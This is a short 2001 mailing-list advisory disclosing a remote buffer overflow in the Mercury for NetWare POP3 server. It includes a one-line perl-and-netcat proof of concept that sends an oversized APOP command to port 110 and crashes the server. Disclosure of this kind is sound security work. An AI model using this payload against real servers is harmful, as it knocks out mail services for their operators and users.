Mercury for NetWare POP3 server vulnerable to remote buffer overflow
Date: Sat, 21 Apr 2001 10:52:15 +0200
From: Przemyslaw Frasunek <[email protected]>
To: [email protected]
Subject: Mercury for NetWare POP3 server vulnerable to remote buffer overflow
Hello,
All versions of widely-used POP3 server from Mercury MTA package for Netware
are vulnerable to remote buffer overflow allowing to crash Netware server:
perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110
Remote execution of malicious code is also theoretically possible.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [email protected] ** PGP: D48684904685DF43EA93AFA13BE170BF *